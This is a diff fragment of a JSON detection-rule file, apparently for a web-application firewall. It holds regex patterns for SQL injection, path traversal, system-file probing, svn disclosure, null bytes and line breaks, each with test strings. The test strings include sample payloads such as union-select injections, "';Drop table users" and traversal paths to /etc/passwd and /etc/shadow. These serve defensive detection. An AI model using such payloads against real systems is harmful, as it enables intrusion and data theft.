+ "common": "\\b(?:having)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[=<>]|(?:\\bexecute(\\s{1,5}[\\w\\.$]{1,5}\\s{0,3})?\\()|\\bhaving\\b ?(?:\\d{1,10}|['\"][^=]{1,10}['\"]) ?[=<>]+|(?:\\bcreate\\s+?table.{0,20}?\\()|(?:\\blike\\W*?char\\W*?\\()|(?:(?:(select(.*?)case|from(.*?)limit|order\\sby)))|exists\\s(\\sselect|select\\Sif(null)?\\s\\(|select\\Stop|select\\Sconcat|system\\s\\(|\\b(?:having)\\b\\s+(\\d{1,10})|'[^=]{1,10}')",
123
268
  "id": "2"
124
269
  },
125
270
  {
126
- "title":"Conditional Attempts",
127
- "sophistication":3,
271
+ "title": "Conditional Attempts",
272
+ "sophistication": 3,
128
273
  "common": "(?:[\\s()]case\\s*\\()|(?:\\)\\s*like\\s*\\()|(?:having\\s*[^\\s]+\\s*[^\\w\\s])|(?:if\\s?\\([\\d\\w]\\s*[=<>~])",
129
274
  "tests": {
130
- "shouldFind":["' or id= 1 having 1 #1 !"],
131
- "shouldIgnore":["aB--D_C=","union soldier", "select", "James O'Connor", "Like this or that", "divide and conquer"]
275
+ "shouldFind": [
276
+ "' or id= 1 having 1 #1 !"
277
+ ],
278
+ "shouldIgnore": [
279
+ "aB--D_C=",
280
+ "union soldier",
281
+ "select",
282
+ "James O'Connor",
283
+ "Like this or that",
284
+ "divide and conquer"
285
+ ]
132
286
  },
133
287
  "id": "7"
134
288
  },
135
289
  {
136
- "title":"Union Attempts",
137
- "sophistication":3,
138
- "java": "(?:union\\s*(?:all|distinct|[(!@]*)\\s*[(\\[]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()",
139
- "ruby": "(?:union\\s*(?:all|distinct|[(!@]*)\\s*[(\\[]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()",
140
- "common": "(?:union\\s*(?:all|distinct|[(!@]*)\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()",
290
+ "title": "Union Attempts",
291
+ "sophistication": 3,
292
+ "common": "(?:union\\s*(?:all|distinct|[(!@]*)\\s*[(\\[]*\\s*select)|(?:\\w+\\s+like\\s+\")|(?:like\\s*\"%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()",
141
293
  "tests": {
142
- "shouldFind":["‘union select all 1,2,x,x,x,x —-", "‘union select 1,2,3,x,x,x,x,@@version,x–-","‘union select UTL_INADDR.get_host_address,null,null,null,null from dual–-"],
143
- "shouldIgnore":["aB--D_C=","union soldier", "select", "James O'Connor", "Like this or that", "divide and conquer"]
294
+ "shouldFind": [
295
+ "'union select all 1,2,x,x,x,x —-",
296
+ "'union select 1,2,3,x,x,x,x,@@version,x–-",
297
+ "'union select UTL_INADDR.get_host_address,null,null,null,null from dual–-"
298
+ ],
299
+ "shouldIgnore": [
300
+ "aB--D_C=",
301
+ "union soldier",
302
+ "select",
303
+ "James O'Connor",
304
+ "Like this or that",
305
+ "divide and conquer"
306
+ ]
144
307
  },
145
308
  "id": "8"
146
309
  },
147
310
  {
148
- "title":"SQL Comment Sequence",
149
- "sophistication":1,
150
- "common": "([';]--|--[\\s\\r\\n\\v\\f]|(?:--[^-]*?-)|([^\\-&])#.*?[\\s\\r\\n\\v\\f]|;?\\\\x00)",
311
+ "title": "SQL Comment Sequence",
312
+ "sophistication": 1,
313
+ "common": "([';]--|--[\\s\\r\\n\\v\\f]|(?:'[\\s\\r\\n\\v\\f]*--[^-]*?-)|#[\\s\\r\\n\\v\\f]*$|;?\\\\x00)",
151
314
  "tests": {
152
- "shouldFind":["'--","1=1;\\x00"],
153
- "shouldIgnore":["aB--D_C=","union soldier", "select", "James O'Connor", "Like this or that", "divide and conquer"]
315
+ "shouldFind": [
316
+ "'--",
317
+ "1=1;\\x00",
318
+ "admin\" #"
319
+ ],
320
+ "shouldIgnore": [
321
+ "aB--D_C=",
322
+ "union soldier",
323
+ "select",
324
+ "James O'Connor",
325
+ "Like this or that",
326
+ "-----BEGIN PGP PUBLIC KEY BLOCK-----",
327
+ "divide and conquer",
328
+ "Order ID# 2345",
329
+ "/url/with/#/hash"
330
+ ]
154
331
  },
155
332
  "id": "3"
156
333
  },
157
334
  {
158
- "title":"Extraction Attempts",
159
- "sophistication":1,
160
- "common": "(?:(?:@.+=\\s*?\\(\\s*?select)|(?:\\d+\\s*?(x?or|div|like|between|and)\\s*?\\d+\\s*?[\\-+])|(?:\\/\\w+;?\\s+(?:having|and|x?or|div|like|between|and|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*?(?:drop|alter))|(?:(?:;|#|--)\\s*?(?:update|insert)\\s*?\\w{2,})|(?:[^\\w]SET\\s*?@\\w+)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*?[!=+]+[\\s\\d]*?[\\\"'`\u00b4\u2019\u2018=()]))",
335
+ "title": "Extraction Attempts",
336
+ "sophistication": 1,
337
+ "common": "(?:(?:@.+=\\s*?\\(\\s*?select)|(?:\\d+\\s*?(x?or|div|like|between|and)\\s*?\\d+\\s*?[\\-+])|(?:/\\w+;?\\s+(?:having|and|x?or|div|like|between|and|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*?(?:drop|alter))|(?:(?:;|#|--)\\s*?(?:update|insert)\\s*?\\w{2,})|(?:[^\\w]SET\\s*?@\\w+)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*?[!=+]+[\\s\\d]*?[\"'`\u00b4\u2019\u2018=()]))",
161
338
  "tests": {
162
- "shouldFind":["';Drop table users"],
163
- "shouldIgnore":["aB--D_C=","union soldier", "select", "James O'Connor", "Like this or that", "divide and conquer", "Sam; James"]
339
+ "shouldFind": [
340
+ "';Drop table users"
341
+ ],
342
+ "shouldIgnore": [
343
+ "aB--D_C=",
344
+ "union soldier",
345
+ "select",
346
+ "James O'Connor",
347
+ "Like this or that",
348
+ "divide and conquer",
349
+ "Sam; James"
350
+ ]
164
351
  },
165
352
  "id": "4"
166
353
  }
167
354
  ]
168
355
  },
169
- "fpt":{
170
- "patterns":[
356
+ "fpt": {
357
+ "patterns": [
171
358
  {
172
- "title":"General Traversal",
173
- "sophistication":2,
174
- "common": "(?:(?:\\/|\\\\)?\\.+(\\/|\\\\)(?:\\.+)?)|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*\\/[\\w*-]+\\/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:\\/(?:%2e){2})",
175
- "ruby": "(?:(?:\\/|\\\\)?\\.+(\\/|\\\\)(?:\\.*))|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*\\/[\\w*-]+\\/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:\\/(?:%2e){2})",
176
- "tests":{
177
- "shouldFind":["/.../.../.../.../.../","\\0../../../../../../etc/passwd","../../../../../../etc/shadow"],
178
- "shouldIgnore":["Julie","The quick'o brown... fox.. was. /there"]
359
+ "title": "General Traversal",
360
+ "sophistication": 2,
361
+ "common": "(?:(?:/|\\\\)?\\.+(/|\\\\)(?:\\.*))|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*/[\\w*-]+/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:/(?:%2e){2})",
362
+ "tests": {
363
+ "shouldFind": [
364
+ "/.../.../.../.../.../",
365
+ "\\0../../../../../../etc/passwd",
366
+ "../../../../../../etc/shadow"
367
+ ],
368
+ "shouldIgnore": [
369
+ "Julie",
370
+ "The quick'o brown... fox.. was. /there"
371
+ ]
179
372
  },
180
373
  "id": "1"
181
374
  },
182
375
  {
183
- "title":"Common System Probing",
184
- "sophistication":4,
185
- "common": "(?:%c0%ae\\/)|(?:(?:\\/|\\\\)(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:\\/|\\\\))|(?:(?:\\/|\\\\)inetpub|localstart\\.asp|boot\\.ini)",
186
- "tests":{
187
- "shouldFind":["/./././././././././././boot.ini","/home/apache/conf/httpd.conf"],
188
- "shouldIgnore":["Julie","The quick'o brown... fox.. was. /there"]
376
+ "title": "Common System Probing",
377
+ "sophistication": 4,
378
+ "common": "(?:%c0%ae/)|(?:(?:/|\\\\)(conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:/|\\\\))|(?:(?:/|\\\\)inetpub|localstart\\.asp|boot\\.ini)",
379
+ "tests": {
380
+ "shouldFind": [
381
+ "/./././././././././././boot.ini",
382
+ "/home/apache/conf/httpd.conf"
383
+ ],
384
+ "shouldIgnore": [
385
+ "/Home/Index",
386
+ "Julie",
387
+ "The quick'o brown... fox.. was. /there"
388
+ ]
189
389
  },
190
390
  "id": "2"
191
391
  },
192
392
  {
193
- "title":"Attempt for /etc/passwd, shadow",
194
- "sophistication":1,
195
- "common": "(?:etc\\/\\W*passwd)|(?:etc\\/\\W*shadow)",
196
- "tests":{
197
- "shouldFind":["/etc/passwd"],
198
- "shouldIgnore":["Julie","The quick'o brown... fox.. was. /there"]
393
+ "title": "Attempt for /etc/passwd, shadow",
394
+ "sophistication": 1,
395
+ "common": "(?:etc/\\W*passwd)|(?:etc/\\W*shadow)",
396
+ "tests": {
397
+ "shouldFind": [
398
+ "/etc/passwd"
399
+ ],
400
+ "shouldIgnore": [
401
+ "Julie",
402
+ "The quick'o brown... fox.. was. /there"
403
+ ]
199
404
  },
200
405
  "id": "3"
406
+ },
407
+ {
408
+ "title": "Spider svn entries disclosure",
409
+ "sophistication": 1,
410
+ "common": ".svn/(./)*entries",
411
+ "tests": {
412
+ "shouldFind": [
413
+ "http://mysite.tld/folder/.svn/entries",
414
+ "http://mysite.tld/folder/.svn/./entries"
415
+ ],
416
+ "shouldIgnore": [
417
+ "mysite.tld/folder/entries/svn/"
418
+ ]
419
+ },
420
+ "id": "4"
201
421
  }
202
422
  ]
203
423
  },
204
- "nullbyte":{
205
- "patterns":[
206
- {
207
- "title":"Any Null Byte",
208
- "sophistication":1,
209
- "id":"1",
210
- "common":"\\0",
211
- "java":"\u0000",
212
- "tests":{
213
- "shouldFind":["Duh\u0000","\u0000","\n\rOh\u0000No"],
214
- "shouldIgnore":["Julie","The quick'o brown... fox.. was. /there"]
424
+ "nullbyte": {
425
+ "patterns": [
426
+ {
427
+ "title": "Any Null Byte",
428
+ "sophistication": 1,
429
+ "id": "1",
430
+ "common": "\\x00",
431
+ "tests": {
432
+ "shouldFind": [
433
+ "Duh\u0000",
434
+ "\u0000",
435
+ "\n\rOh\u0000No"
436
+ ],
437
+ "shouldIgnore": [
438
+ "Julie",
439
+ "The quick'o brown... fox.. was. /there"
440
+ ]
215
441
  }
216
442
  }
217
443
  ]
218
444
  },
219
- "retr":{
220
- "patterns":[
221
- {
222
- "title":"Any Line-Break Character",
223
- "sophistication":1,
224
- "id":"1",
225
- "common":"(\\n|\\r)",
226
- "tests":{
227
- "shouldFind":["Duh\r","\r\n","\n\rOh\\0No"],
228
- "shouldIgnore":["Julie","The quick'o brown... fox.. was. /there"]
445
+ "retr": {
446
+ "patterns": [
447
+ {
448
+ "title": "Any Line-Break Character",
449
+ "sophistication": 1,
450
+ "id": "1",
451
+ "common": "(\\n|\\r)",
452
+ "tests": {
453
+ "shouldFind": [
454
+ "Duh\r",
455
+ "\r\n",
456
+ "\n\rOh\\0No"
457
+ ],
458
+ "shouldIgnore": [
459
+ "Julie",
460
+ "The quick'o brown... fox.. was. /there"
461
+ ]
229
462
  }
230
463
  }
231
464
  ]